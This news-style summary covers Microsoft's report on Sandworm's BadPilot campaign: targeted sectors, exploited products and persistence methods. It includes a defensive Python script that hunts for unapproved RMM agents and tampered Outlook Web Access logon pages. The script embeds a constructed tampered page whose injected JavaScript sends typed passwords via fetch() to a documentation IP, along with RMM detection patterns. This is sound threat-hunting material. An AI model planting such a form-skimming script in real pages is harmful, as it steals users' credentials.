Russian Hackers’ ‘BadPilot’ Campaign Strikes Critical Infrastructure Across 15+ Nations


Russian Sandworm Hacking Group Expands Global Reach with BadPilot Operation

An initial-access subgroup of the Russian state-sponsored hacking group Sandworm (tracked by Microsoft as Seashell Blizzard) has been conducting a global cyber operation called BadPilot since at least late 2021, gaining and holding footholds in victim networks for follow-on Sandworm operations. Microsoft’s Threat Intelligence team reports that this campaign has significantly expanded the group’s reach beyond its traditional Eastern European targets.

Global Impact and Targeting
The operation spans multiple continents, affecting:
– North America
– Europe
– Asia-Pacific
– Africa
– South America

Key sectors targeted include:
– Energy
– Oil and gas
– Telecommunications
– Shipping
– Arms manufacturing
– Government institutions

Technical Operations
The group gains initial access by exploiting known vulnerabilities in internet-facing products, including:
– Microsoft Exchange Server
– Zimbra Collaboration
– Fortinet FortiClient EMS
– ConnectWise ScreenConnect
– JetBrains TeamCity

Persistence Methods:
1. Deployment of legitimate remote monitoring and management (RMM) software (Atera Agent, Splashtop), which blends in with administrative tooling
2. Deployment of the LocalOlive web shell on compromised servers
3. Modification of Outlook Web Access (OWA) sign-in pages on compromised Exchange servers
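Two of the three persistence methods above leave artifacts a defender can hunt for: an RMM agent the IT team never deployed, and an OWA sign-in page whose content no longer matches the install. The script below is an added example, not code from Microsoft or from the article; it works over a constructed software inventory (hosts ex01, fs02, dc01) and a constructed miniature OWA page tree, with a hypothetical per-host RMM allowlist. The tampered logon page is built to copy the typed password to 198.51.100.23, an RFC 5737 documentation address chosen here to illustrate credential capture, not a reported indicator.

```python
"""Hunt for BadPilot-style persistence artifacts: unapproved RMM agents and drifted OWA pages."""
import hashlib
import re
from typing import Dict, List, Set, Tuple

# --- Part 1: unapproved remote-management (RMM) agents -----------------------

# Constructed sample inventory, one record per line: host|product|publisher.
# Hosts and entries are made up for this example.
SAMPLE_INVENTORY = """\
ex01|Microsoft Exchange Server 2019 Cumulative Update 13|Microsoft Corporation
ex01|Atera Agent|Atera Networks Ltd.
ex01|Splashtop Streamer|Splashtop Inc.
fs02|Splashtop Streamer|Splashtop Inc.
dc01|Microsoft Monitoring Agent|Microsoft Corporation
"""

# Hypothetical allowlist: hosts where IT deliberately deployed a given RMM product.
APPROVED_RMM: Dict[str, Set[str]] = {"fs02": {"Splashtop Streamer"}}

# The two RMM families the reporting names as BadPilot persistence tooling.
RMM_PATTERNS = [re.compile(r"\batera\b", re.I), re.compile(r"\bsplashtop\b", re.I)]


def find_unapproved_rmm(inventory: str,
                        approved: Dict[str, Set[str]] = APPROVED_RMM) -> List[Tuple[str, str]]:
    """Return (host, product) pairs for RMM installs not covered by the allowlist."""
    hits: List[Tuple[str, str]] = []
    for line in inventory.splitlines():
        if not line.strip():
            continue
        host, product, publisher = (f.strip() for f in line.split("|", 2))
        is_rmm = any(p.search(product) or p.search(publisher) for p in RMM_PATTERNS)
        if is_rmm and product not in approved.get(host, set()):
            hits.append((host, product))
    return hits


# --- Part 2: tampered Outlook Web Access sign-in pages ----------------------

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-in for the real OWA logon page (the real file is far larger).
GOOD_LOGON = b"""<form action="/owa/auth.owa" method="POST" name="logonForm">
<input name="username"><input name="password" type="password">
</form>"""

# Constructed tampered copy: an injected script sends the typed password to an
# attacker host before the legitimate POST. 198.51.100.23 is a documentation
# address (RFC 5737), not a real indicator.
BAD_LOGON = GOOD_LOGON + b"""
<script>document.logonForm.onsubmit=function(){fetch("https://198.51.100.23/c",
{method:"POST",body:document.logonForm.password.value});};</script>"""

GOOD_CSS = b"body { font-family: Segoe UI; }"

# Baseline manifest: path -> SHA-256 recorded from a known-good install.
BASELINE_MANIFEST = {
    "owa/auth/logon.aspx": sha256_hex(GOOD_LOGON),
    "owa/auth/owa.css": sha256_hex(GOOD_CSS),
}

# What a collector found on the server now (constructed).
CURRENT_PAGES = {
    "owa/auth/logon.aspx": BAD_LOGON,
    "owa/auth/owa.css": GOOD_CSS,
}

ABS_URL = re.compile(rb"https?://([^\s/'\"<>]+)", re.I)


def external_hosts(content: bytes) -> Set[str]:
    """Hosts referenced by absolute URLs; a stock OWA auth page uses relative paths."""
    return {m.group(1).decode("ascii", "replace") for m in ABS_URL.finditer(content)}


def check_owa_pages(current: Dict[str, bytes], baseline: Dict[str, str]) -> List[dict]:
    """Compare every baselined file with its current content and report drift."""
    findings: List[dict] = []
    for path, expected in sorted(baseline.items()):
        content = current.get(path)
        if content is None:
            findings.append({"path": path, "reason": "missing", "external_hosts": set()})
            continue
        if sha256_hex(content) != expected:
            findings.append({"path": path, "reason": "hash mismatch",
                             "external_hosts": external_hosts(content)})
    # Files present now but absent from the baseline (e.g. a web shell dropped
    # beside the auth pages) deserve a look as well.
    for path in sorted(set(current) - set(baseline)):
        findings.append({"path": path, "reason": "not in baseline",
                         "external_hosts": external_hosts(current[path])})
    return findings


if __name__ == "__main__":
    for host, product in find_unapproved_rmm(SAMPLE_INVENTORY):
        print(f"[RMM] unapproved agent on {host}: {product}")
    for f in check_owa_pages(CURRENT_PAGES, BASELINE_MANIFEST):
        print(f"[OWA] {f['path']}: {f['reason']} external={sorted(f['external_hosts'])}")
```

In practice the inventory would come from an EDR or software-asset export and the baseline manifest would be recorded immediately after patching Exchange, then re-checked on a schedule; the allowlist matters because the same RMM products are legitimate in many environments, so "present" is not a finding but "present where nobody deployed it" is.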

Recent Developments
– The group has increasingly sourced tools and infrastructure from criminal marketplaces
– New malware includes the BACKORDER and Kalambur families
– Abuse of pirated software as a delivery vector for trojanized installers, particularly in Ukraine
– Use of the Tor network for command-and-control operations

Microsoft assesses that this expansion of Sandworm’s operations gives Russia a broader set of footholds from which to launch targeted cyber operations, representing a significant evolution in the group’s capabilities and reach.
